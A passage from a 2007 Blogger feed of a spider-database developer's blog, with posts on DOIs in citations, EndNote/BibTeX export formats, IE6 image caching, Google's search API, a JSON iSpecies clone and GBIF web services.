the References Cited Section</title><content type='html'>I just read a &lt;a href="http://www.crossref.org/CrossTech/2007/09/styles_guides_recommend_doi_1.html"&gt;recent post&lt;/a&gt; by Ed Pentz (Executive Director of &lt;a href="http://www.crossref.org"&gt;CrossRef&lt;/a&gt;) who alerted his readers to some recent changes to recommended &lt;a href="https://catalog.ama-assn.org/Catalog/product/product_detail.jsp?productId=prod1020022?checkXwho=done"&gt;American Medical Association&lt;/a&gt; and &lt;a href="http://apastyle.apa.org/"&gt;American Psychological Association&lt;/a&gt; style guides. Ed also provides two examples. Essentially, a string like "doi:10.1016/j.ssresearch.2006.09.002" is to be tagged at the end of each reference (if these dois exist) in the literature cited section of journals that use AMA or APA styles. Cool! It would be a snap to write a JavaScript to recognize "doi:" on a page and magically add the "http://dx.doi.org/" and I have no doubt publishers can do something similar prior to producing PDF reprints. Ed seemed puzzled by the exclusion of "http://dx.doi.org/", but this is a really smart move by the AMA and the APA. DOIs afterall are URNs so it's best to avoid any confusion. If paper publishers want to make these actionable, then they can do so. If web publishers want to do the same, then a simple little JavaScript can do it.&lt;br /&gt;&lt;br /&gt;So, what we need now are style editors to pick-up this recommedation across the board in all journals in all disciplines. This simple addition would do a world of good for human discoverability and for machine consumption/repurposing. It shouldn't just be a recommendation, it should be mandatory.&lt;br /&gt;&lt;br /&gt;Hopefully, this will step-up the drive for including XMP metadata within PDF reprints. It may be a pain for authors to track down DOIs if they're not stamped on the covering page (usually hovering around the abstract or the very top of the page) and consequently, adoption of this new recommendation may be rather slow. If the DOI were embedded in the XMP, then reference managers like EndNote and RefMan will naturally read these metadata. In other words, building your reference collection would be as simple as dropping a PDF in a watched file folder and letting your reference manager do the rest. This would also open the door to zero local copies of PDFs or an intelligent online storage system. EndNote and RefMan need only have the DOI and they can pull the rest using CrossRef's DOI look-up services.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-1250966238359263816?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/1250966238359263816/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=1250966238359263816' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1250966238359263816'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1250966238359263816'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/09/dois-in-references-cited-section.html' title='DOIs in the References Cited Section'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-1385024241116841999</id><published>2007-09-27T22:15:00.000-06:00</published><updated>2007-10-06T14:03:15.838-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='peer-review'/><category scheme='http://www.blogger.com/atom/ns#' term='EoL'/><title type='text'>Would You Cite a Web Page?</title><content type='html'>Species pages in &lt;a href="http://www.canadianarachnology.org/data/canada_spiders/"&gt;The Nearctic Spider Database&lt;/a&gt; are peer-reviewed in the very traditional sense. But, instead of doling out pages that need to be reviewed, I leave it up to authors to anonymously review each others' works. Not just anyone can author a species page; you at least need to show me that you have worked on spiders in some capacity. Once three reviews for any page have been received and the author has made the necessary changes (I &lt;em&gt;can&lt;/em&gt; read who wrote what and when), I flick the switch and the textual contributions by the author are locked. There is still dynamically created content on these species pages like maps, phenological charts, State/Province listings, etc. However, at the end of the day, these are still just web pages, though you can download a PDF if you really want to.&lt;br /&gt;&lt;br /&gt;Google Scholar allows you to set your preferences for downloading an import file for &lt;a href="http://www.bibtex.org/"&gt;BibTex&lt;/a&gt;, &lt;a href="http://www.endnote.com/"&gt;EndNote&lt;/a&gt;, &lt;a href="http://www.refman.com/"&gt;RefMan&lt;/a&gt;, &lt;a href="http://www.refworks.com/"&gt;RefWorks&lt;/a&gt;, and WenXianWang so I thought I would duplicate this functionality for species pages in The Nearctic Spider Database, though limited to BibTex and EndNote. I'm not at all familiar with the last three reference managers and I suspect they are not as popular as EndNote and BibTex. Incidentally, Thomson puts out both EndNote and RefMan and recently, they released &lt;a href="http://www.endnoteweb.com/"&gt;EndNoteWeb&lt;/a&gt;. As cool as EndNoteWeb looks, Thomson has cut it off at the knees by limiting the number of references you can store in an online account to 10,000. Anyone know anything about WenXianWang? I couldn't find a web site for that application anywhere. So, here's how it works:&lt;br /&gt;&lt;br /&gt;First, it's probably a good idea to set the MIME types on the server though this is likely unnecessary because these EndNote and BibTex files are merely text files:&lt;br /&gt;&lt;br /&gt;EndNote: application/x-endnote-refer (extension .enw)&lt;br /&gt;BibTex: ?? (extension .bib)&lt;br /&gt;&lt;br /&gt;Second, we need to learn the contents of these files:&lt;br /&gt;&lt;br /&gt;EndNote: called "tagged import format" where fields are designated with a two-charcter code that starts with a % symbol (e.g. %A). After the fields, there is a space, and then the contents. It was a pain in the neck to find all these but at least the University of Leicester put out a Word document &lt;a href="http://www.le.ac.uk/library/downloads/endnotetaggedfile.doc"&gt;HERE&lt;/a&gt;. Here's an example of the file for a species page in The Nearctic Spider Database:&lt;br /&gt;&lt;div style="font-size:x-small"&gt;&lt;br /&gt;%0 Web Page&lt;br /&gt;%T Taxonomic and natural history description of FAM: THOMISIDAE, Ozyptila conspurcata Thorell, 1877.&lt;br /&gt;%A Hancock, John&lt;br /&gt;%E Shorthouse, David P.&lt;br /&gt;%D 2006&lt;br /&gt;%W http://www.canadianarachnology.org/data/canada_spiders/&lt;br /&gt;%N 9/27/2007 10:40:40 PM&lt;br /&gt;%U http://www.canadianarachnology.org/data/spiders/30843&lt;br /&gt;%~ The Nearctic Spider Database&lt;br /&gt;%&gt; http://www.canadianarachnology.org/data/spiderspdf/30843/Ozyptila%20conspurcata&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;BibTex: Thankfully, developers at BibTex recognize the importance of good, simple documentation and have a page devoted to the &lt;a href="http://www.bibtex.org/Format/"&gt;format&lt;/a&gt;. But, the examples for reference type are rather limited. Again, I had to go on a hunt for more documentation. What was of great help was the documentation for the &lt;a href="http://www.dante.de/CTAN//biblio/bibtex/contrib/apacite/apacite.pdf"&gt;apacite package&lt;/a&gt;, which outlines the rules in use for the American Psychological Association. In particular, p. 15-26 of that PDF was what I needed. &lt;strong&gt;However, where's the web page reference type?&lt;/strong&gt; Most undergraduate institutions in NA still enforce a no web page citation policy on submitted term papers, theses, etc. so it really wasn't a surprise to see no consideration for web page citations. So, what is the &lt;a href="http://www.eol.org"&gt;Encyclopedia of Life&lt;/a&gt; to do? The best format I could match for EndNote's native handling of web pages was the following:&lt;br /&gt;&lt;div style="font-size:x-small"&gt;&lt;br /&gt;@misc{hancock30843,&lt;br /&gt;author =  {Hancock, John},&lt;br /&gt;title = {Taxonomic and natural history description of FAM: THOMISIDAE, Ozyptila conspurcata Thorell, 1877.},&lt;br /&gt;editor = {Shorthouse, David P.},&lt;br /&gt;howpublished = {World Wide Web electronic publication},&lt;br /&gt;type = {web page},&lt;br /&gt;url = {http://www.canadianarachnology.org/data/spiders/30843},&lt;br /&gt;publisher = {The Nearctic Spider Database},&lt;br /&gt;year = {2006}&lt;br /&gt;}&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Now, BibTex is quite flexible in its structure so there could very well be a proper way to do this. But, the structure must be recognized by the rule-writing templates like APA otherwise it is simply ignored.&lt;br /&gt;&lt;br /&gt;The EndNote download is available at the bottom of every authored species page in the database's website via a click on the EndNote icon (example: &lt;a href="http://www.canadianarachnology.org/data/spiders/30843"&gt;http://www.canadianarachnology.org/data/spiders/30843&lt;/a&gt;). I have no idea if the BibTex format above is appropriate so I welcome some feedback before I enable that download.&lt;br /&gt;&lt;br /&gt;But, all this raises a question...&lt;br /&gt;&lt;br /&gt;Would you import a reference to a peer-reviewed web page into your reference managing programs and, if you are an educator, should you consider allowing undergraduates an opportunity to cite such web pages? Would you yourself site such pages? Do we need a generic, globally recognized badge that exclaims "peer-reviewed" on these kinds of pages? Open access does not mean content is not peer-reviewed or any less scientific. Check out some myth-busting &lt;a href="http://www.biomedcentral.com/openaccess/inquiry/myths/?myth=all"&gt;HERE&lt;/a&gt;. What if peer-reviewed web pages had DOIs, thus taking a great leap away from URL rot and closer toward what Google does with its index - calculations of page popularity. Citation rates (&lt;em&gt;i.e.&lt;/em&gt; popularity) is but one outcome of the DOI model for scientific papers. If I anticipated a wide, far-reaching audience for a publication, I wouldn't care two hoots if it was freely available online as flat HTML, a PDF, or as MS Word or if the journal (traditional or non-traditional) has a high impact factor as &lt;a href="http://www.sciencegateway.org/impact/"&gt;mysteriously calculated&lt;/a&gt; by, you guessed it, Thomson ISI. If DOIs are the death-knoll for journal impact factors, are web pages the death knoll for paper-only publications?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-1385024241116841999?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/1385024241116841999/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=1385024241116841999' title='8 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1385024241116841999'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1385024241116841999'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/09/would-you-cite-web-page.html' title='Would You Cite a Web Page?'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-7866410298406059331</id><published>2007-09-26T00:05:00.000-06:00</published><updated>2007-09-26T02:01:05.459-06:00</updated><title type='text'>IE6 is Crap By Design</title><content type='html'>I give up. I have had it. Internet Explorer 6 absolutely sucks.&lt;br /&gt;&lt;br /&gt;Since I first started toying with JavaScript and using .innerHTML to dynamically add, change, or remove images on a web page in response to a user's actions or at page load (e.g. search icons &lt;a href="http://ispiders.blogspot.com/2007/08/gimme-that-scientific-paper-part-iii.html"&gt;tagged at the end of scientific references&lt;/a&gt; to coordinate user click-to-check existence of DOI, Handle, or PDF via Rod Page's JSON reference parsing web service at &lt;a href="http://bioGUID.info"&gt;bioGUID.info&lt;/a&gt;), I have struggled with the way this version of the browser refuses to cache images.&lt;br /&gt;&lt;br /&gt;If multiple, identical images are inserted via .innerHTML, IE6 makes a call to the server for every single copy of the image. Earlier and later versions of IE do not have this problem; these versions happily use the cache as it's meant to be used and do not call the server for yet another copy of an identical image. I tried everything I can think of from preloading the image(s), using the DOM (&lt;em&gt;i.e.&lt;/em&gt; .appendChild()), server-side tricks, &lt;em&gt;etc.&lt;/em&gt; but nothing works. Page loads are slow for these users and the appended images via .innerHTML may or may not appear, especially if there are a lot of successive .innerHTML calls. Missing images may or may not appear with a page refresh and images that were once present may suddenly disappear with a successive page refresh. Because AJAX is becoming more and more popular &amp; as a consequence, there are more instances of .innerHTML = "&amp;ltimg src="..."&amp;gt; in loops, don't these people think something is not right with their browser? I doubt it. Instead, I suspect they instead think something is wrong with the web page and likely won't revisit.&lt;br /&gt;&lt;br /&gt;Here's some example code that causes the problem for an IE6 user:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;...&lt;br /&gt;for (i=0;i&amp;lt;foo;i++) {&lt;br /&gt;bar.innerHTML = "&amp;lt;img src="..."&amp;gt;;&lt;br /&gt;}&lt;br /&gt;...&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Web server log lines like the following (abridged to protect the visitor to The Nearctic Spider Database) fill 10-20% of these daily files:&lt;br /&gt;&lt;div style="font-size:x-small"&gt;&lt;br /&gt;GET /bioGUID/magnifier.png - 80 - HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;...etc...)&lt;br&gt;&lt;br /&gt;GET /bioGUID/magnifier.png - 80 - HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;...etc...)&lt;br&gt;&lt;br /&gt;GET /bioGUID/magnifier.png - 80 - HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;...etc...)&lt;br&gt;&lt;br /&gt;GET /bioGUID/magnifier.png - 80 - HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;...etc...)&lt;br&gt;&lt;br /&gt;GET /bioGUID/magnifier.png - 80 - HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;...etc...)&lt;br&gt;&lt;br /&gt;GET /bioGUID/magnifier.png - 80 - HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;...etc...)&lt;br&gt;&lt;br /&gt;GET /bioGUID/magnifier.png - 80 - HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;...etc...)&lt;br&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;So, I wonder how much bandwidth on the Internet superhighway is consumed by this terrible design flaw? Microsoft is aware of the issue, but weakly tried to convince us that this behaviour is "by design" as can be read in their &lt;a href="http://support.microsoft.com/default.aspx?scid=kb;en-us;319546"&gt;Knowledge Base Article Q319546&lt;/a&gt;. Give me a break. The solution in that article is pathetic and doesn't work.&lt;br /&gt;&lt;br /&gt;Depending on what you do in your JavaScript, you can either force an HTTP status code of 200 OK (&lt;em&gt;i.e.&lt;/em&gt; image is re-downloaded, thus consuming unnecessary bandwidth) or an HTTP status code of 304 Not Modified ("you already got it dummy, I'm not sending it again" - but still &lt;em&gt;some&lt;/em&gt; bandwidth). Though I haven't yet investigated before/after in my web logs, others have reported that the following code at the start of some JavaScript will force a 304:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;try {&lt;br /&gt;  document.execCommand("BackgroundImageCache", false, true);&lt;br /&gt;} catch(err) {}&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;I'm not convinced that this will work.&lt;br /&gt;&lt;br /&gt;After pulling my hair out for 2+ years trying to come up with a work-around, I have concluded that the only way this problem can be prevented is if the user adjusts how their own cache works. If you are an IE6 user, see the &lt;a href="http://ahinea.com/en/tech/ie-dhtml-image-caching.html"&gt;note by Ivan Kurmanov&lt;/a&gt; on how to do this - incidentally, Ivan's server-side tricks also don't work). In a nutshell, if you use IE6, DO NOT choose "Every visit to the page" option in your browser's cache settings. Unfortunately, there is no way for a developer to detect a user's cache settings. Like pre-IE6 and post-IE6 users, people with IE6 whose cache is set to check for newer content "Automatically", "Never" or "Every time you start Internet Explorer" also do not have this problem.&lt;br /&gt;&lt;br /&gt;Developers (&lt;a href="http://www.bazon.net/mishoo/Articles/msie/958/"&gt;like Mishoo&lt;/a&gt;) have suggested that this "by design" flaw is a means for Microsoft to artificially inflate its popularity in web server log analyses. But, I doubt analysis software confuses multiple downloads from the same IP address with browser popularity. So how can this possibly be by design if there is no way for a developer to circumvent it? Who knows.&lt;br /&gt;&lt;br /&gt;The only real solution I have been able to dream up, though I haven't implemented it, is to perform a JavaScript browser version check. If people choose to use IE6 and don't upgrade to IE7 then they won't get the added goodies. I certainly don't want to degrade their anticipated experience, but I also have to think about cutting back on pushing useless bandwidth, which is not free. If you insist on using IE, please &lt;a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=9ae91ebe-3385-447c-8a30-081805b2f90b&amp;DisplayLang=en"&gt;upgrade to IE7&lt;/a&gt;. This version of the browser was released a year ago. Better yet, make the switch to &lt;a href="http://www.mozilla.com/en-US/firefox/"&gt;FireFox&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-7866410298406059331?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/7866410298406059331/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=7866410298406059331' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7866410298406059331'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7866410298406059331'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/09/ie6-is-crap-by-design.html' title='IE6 is Crap By Design'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-1365168045518383855</id><published>2007-09-25T17:29:00.000-06:00</published><updated>2007-09-25T19:04:06.607-06:00</updated><title type='text'>Google Search JSON API</title><content type='html'>&lt;a href="http://4.bp.blogspot.com/_VYUFlXOCOxE/RvmaKsB2V7I/AAAAAAAAAEk/rV0lrz8VTx8/s1600-h/code_sm.png"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/RvmaKsB2V7I/AAAAAAAAAEk/rV0lrz8VTx8/s320/code_sm.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5114288360264193970" /&gt;&lt;/a&gt; Google is obviously producing JSON outputs from most (if not all) of its search offerings because they have an API called "&lt;a href="http://code.google.com/apis/ajaxsearch/"&gt;Google AJAX Search API&lt;/a&gt;". Signing up for a key allows a developer to pull search results for use on web pages in a manner identical to my &lt;a href="http://canadianarachnology.dyndns.org/iSpecies/"&gt;iSpecies Clone&lt;/a&gt;. However, it is an absolute pain in the neck to use this API. It is nowhere near as useful as &lt;a href="http://developer.yahoo.com/"&gt;Yahoo's web services&lt;/a&gt;. Google goes to great lengths to obfuscate the construction of its JSON outputs and these are produced from RESTful URLs, buried deep in its JavaScript API. So, I went on a hunt...&lt;br /&gt;&lt;br /&gt;Within a JavaScript file called "uds_compiled.js" that gets embedded in the page via the API, there are several functions, which are (somewhat) obvious:&lt;br /&gt;GwebSearch(), GadSenseSearch(uds), GsaSearch(uds) [aside: Is this Google Scholar? There is no documentation in the &lt;a href="http://code.google.com/apis/ajaxsearch/"&gt;API how-to&lt;/a&gt;], GnewsSearch(), GimageSearch(), GlocalSearch(), GblogSearch(), GblogSearch(), and finally GbookSearch().&lt;br /&gt;Since all these functions are called from JSON with an on-the-fly callback, why make this so difficult to? If I had some time on my hands, I'd deobfuscate the API to see how the URLs are constructed such that I could reproduce Yahoo's API. Incidentally, I just now noticed that Yahoo has an optional parameter in its API called "site" whereby one can limit the search results to a particular domain (e.g. site=wikipedia.org).&lt;br /&gt;&lt;br /&gt;So Google, if you are now producing an API like AJAX Search, why make it so difficult and force the output into a Google-based UI? Developers just want the data. You could just as easily force a rate limit as does Yahoo for its API: 5,000 queries per IP per day per API. Problem solved.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-1365168045518383855?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/1365168045518383855/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=1365168045518383855' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1365168045518383855'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1365168045518383855'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/09/google-search-json-api.html' title='Google Search JSON API'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_VYUFlXOCOxE/RvmaKsB2V7I/AAAAAAAAAEk/rV0lrz8VTx8/s72-c/code_sm.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-5778181358759010529</id><published>2007-09-25T02:58:00.000-06:00</published><updated>2007-10-06T14:06:15.765-06:00</updated><title type='text'>iSpecies Clone</title><content type='html'>For kicks, I created an iSpecies clone that uses nothing but JSON. Consequently, there is no server-side scripting and the entire "engine" if you will is within one 12KB external JavaScript file. The actual page is flat HTML. What this means is that you can embed the engine on any web page, including &lt;em&gt;&amp;lt;&amp;lt;ahem&amp;gt;&amp;gt;&lt;/em&gt; Blogger. You can try it out yourself here: &lt;a href="http://www.canadianarachnology.org/iSpecies/"&gt;iSpecies Clone&lt;/a&gt;. Or live:&lt;br /&gt;&lt;script src="http://www.canadianarachnology.org/iSpecies/files/json.js" type="text/javascript"&gt;&lt;/script&gt;&lt;div id="search_header"&gt;&lt;div style="MARGIN-LEFT: auto; WIDTH: 475px; MARGIN-RIGHT: auto"&gt;&lt;form action="http://ispiders.blogspot.com/2007/09/ispecies-clone.html" method="get"&gt;&lt;div id="iSpeciesSearch" name="iSpeciesSearch"&gt;&lt;img alt="iSpecies" src="http://canadianarachnology.dyndns.org/iSpecies/files/iSpecies.png" /&gt;&lt;br /&gt;&lt;input size="40" name="species"&gt; &lt;input type="submit" value="Search!"&gt;&lt;/div&gt;&lt;/form&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="searchedTerm"&gt;&lt;/div&gt;&lt;div id="spinner"&gt;&lt;/div&gt;&lt;div id="refine"&gt;&lt;/div&gt;&lt;div id="results"&gt;&lt;/div&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_VYUFlXOCOxE/RvjRNsB2V5I/AAAAAAAAAEU/AsD15rczohk/s1600-h/logo.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5114067409966618514" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://3.bp.blogspot.com/_VYUFlXOCOxE/RvjRNsB2V5I/AAAAAAAAAEU/AsD15rczohk/s320/logo.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Rod Page was the first to create a semi taxonomically-based search engine called &lt;a href="http://darwin.zoology.gla.ac.uk/~rpage/ispecies/"&gt;iSpecies&lt;/a&gt; (see &lt;a href="http://ispecies.blogspot.com/"&gt;iSpecies blog&lt;/a&gt;)that uses web services. He recently gave it a facelift using JSON data sources. This has significantly improved the response time for iSpecies because it is now simple and asynchronous. Rod could continue to pile on web services to his heart's content.&lt;br /&gt;&lt;br /&gt;Dave Martin is producing JSON web services for GBIF and recently added a common name and scientific name search. It occurred to me that iSpecies could initially connect to GBIF to produce arrays of scientific and GBIF-matched common names prior to sending off a search to Yahoo or Flickr. Most tags in these image repositories would have common names. Likewise, if the Yahoo News API is of interest, then of course it would be useful to obtain common names prior to making a call to that web service. That's how the iSpecies clone above works. Oh, and scientific names are also searched when a common name is found and recognized by GBIF.&lt;br /&gt;&lt;br /&gt;This clone is naturally missing material compared to the results obtained when conducting a real iSpecies search (e.g. genomics, Google Scholar - though is simply disabled here - and what looks to be &lt;em&gt;some&lt;/em&gt; scripting for name-recognition above the level of species). If big player data providers like &lt;a href="http://www.ncbi.nlm.nih.gov/"&gt;NCBI&lt;/a&gt;, &lt;a href="http://www.ubio.org/"&gt;uBio&lt;/a&gt;, &lt;a href="http://barcoding.si.edu/"&gt;CBOL&lt;/a&gt;, &lt;em&gt;etc.&lt;/em&gt; produced JSON instead of or in addition to XML, then it would be incredibly easy to make custom search engines like this that can be embedded in a gadget.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_VYUFlXOCOxE/RvjVN8B2V6I/AAAAAAAAAEc/QzPm-_E2O3Y/s1600-h/xmp_tm.gif"&gt;&lt;img id="BLOGGER_PHOTO_ID_5114071812308096930" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/RvjVN8B2V6I/AAAAAAAAAEc/QzPm-_E2O3Y/s320/xmp_tm.gif" border="0" /&gt;&lt;/a&gt;After having tinkered a lot with JSON lately, it is now abundantly clear to me that &lt;a href="http://www.eol.org/"&gt;The Encyclopedia of Life&lt;/a&gt; (EOL) species pages absolutely &lt;em&gt;must&lt;/em&gt; have DOIs and plenty of web services to repurpose the data it will index. If we really want EOL to succeed in the mass media, then these species page DOIs should also be integrated into Adobe's &lt;a href="http://www.adobe.com/products/xmp/"&gt;XMP metadata&lt;/a&gt; along with some quick and easy ways to individually- and batch-embed them.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-5778181358759010529?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/5778181358759010529/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=5778181358759010529' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5778181358759010529'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5778181358759010529'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/09/ispecies-clone.html' title='iSpecies Clone'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_VYUFlXOCOxE/RvjRNsB2V5I/AAAAAAAAAEU/AsD15rczohk/s72-c/logo.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-7403186900771961650</id><published>2007-09-20T09:22:00.000-06:00</published><updated>2007-10-25T13:35:33.969-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='GBIF'/><title type='text'>GBIF web services on the rise</title><content type='html'>Look out EOL, Dave Martin has been very quickly creating some superb web services for GBIF data. Check out the &lt;a href="http://wiki.gbif.org/dadiwiki/wikka.php?wakka=HomePage"&gt;GBIF portal wiki&lt;/a&gt; or the various name search APIs that produce text, xml, JSON, or simple deep-linking: &lt;a href="http://wiki.gbif.org/dadiwiki/wikka.php?wakka=DeveloperAPIs"&gt;HERE&lt;/a&gt;. As an example of the kinds of things Dave and Tim Robertson have been producing, here is a map gadget showing all the records in a 1 degree cell shared to GBIF from The Nearctic Spider Database:&lt;br /&gt;&lt;iframe src='http://data.gbif.org/datasets/provider/29/mapWidget?size=small' frameborder='0' scrolling='no' width='360px' height='235px'&gt;&lt;/iframe&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-7403186900771961650?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/7403186900771961650/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=7403186900771961650' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7403186900771961650'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7403186900771961650'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/09/gbif-web-services-on-rise.html' title='GBIF web services on the rise'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-4277474808172815954</id><published>2007-09-12T10:27:00.000-06:00</published><updated>2007-09-12T15:08:23.774-06:00</updated><title type='text'>EOL "WorkBench" Ideas Loosely Joined</title><content type='html'>Just how quickly The &lt;a href="http://www.eol.org"&gt;Encyclopedia of Life's&lt;/a&gt; "WorkBench" environment can be assembled will be interesting. For those of you unfamiliar with this critical aspect of the initiative, it will be the environment in which users will access and manipulate content from web services and other data providers, EOL indexed content, and a user's local hard drive AND simultaneously contribute (if desired, I expect this to be optional) to public facing species pages. As you can imagine a suite of things have to fall into place for all the pieces to play nicely in a simple graphical user interface. Expectations are high for this application to be THE savior, which I hope will differentiate EOL from WikiSpecies and other similar projects/initiatives.&lt;br /&gt;&lt;br /&gt;&lt;a 